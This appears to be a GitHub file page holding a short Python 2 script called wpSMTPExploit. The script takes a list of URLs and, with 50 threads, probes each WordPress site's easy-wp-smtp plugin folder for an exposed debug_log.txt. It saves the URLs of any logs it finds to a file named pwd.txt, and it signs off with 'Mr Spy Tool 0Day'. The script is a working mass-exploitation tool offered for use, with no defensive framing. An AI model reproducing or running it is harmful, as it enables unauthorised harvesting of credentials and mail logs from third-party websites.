-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathwpSMTPExploit.py
More file actions
45 lines (39 loc) · 1.32 KB
/
Copy pathwpSMTPExploit.py
File metadata and controls
45 lines (39 loc) · 1.32 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#!/usr/bin/python
# Code Name : wpSMTPExploit
# -*-coding:Latin-1-*-
import requests
from multiprocessing.dummy import Pool as ThreadPool
import re
def exp(url):
try:
url = url.replace('\n', '').replace('\r', '')
op = requests.get(url + '/wp-content/plugins/easy-wp-smtp/', timeout = 7).content
if "debug_log.txt" in op and "img" not in op:
filter = re.findall('>(.*?)_debug_log.txt', str(op))[0]
replace = filter.replace('<td valign="top"> </td><td><a href="', '')
print "[+] Vuln Found " + url + " DebugFile " + replace + '_debug_log.txt'
open("pwd.txt", "a").write(url + '/wp-content/plugins/easy-wp-smtp/' + replace + '_debug_log.txt' "\n")
else :
print '-> ' + url
except:
print "timeOut -> " + url
pass
print("""\033[93m
__ _______ _____ __ __ _______ _____
\ \ / / __ \ / ____| \/ |__ __| __ \
\ \ /\ / /| |__) | (___ | \ / | | | | |__) |
\ \/ \/ / | ___/ \___ \| |\/| | | | | ___/
\ /\ / | | ____) | | | | | | | |
\/ \/ |_| |_____/|_| |_| |_| |_| WP SMTP Exploit
""".format(a = "\033[92m", b = "\033[94m"))
try:
a = raw_input('enter list :')
ListPass = open(a, 'r').readlines()
pool = ThreadPool(50)
pool.map(exp, ListPass)
pool.close()
pool.join()
except:
print 'File not found !!'
if __name__ == '__main__':
print("Finished, success using Mr Spy Tool 0Day")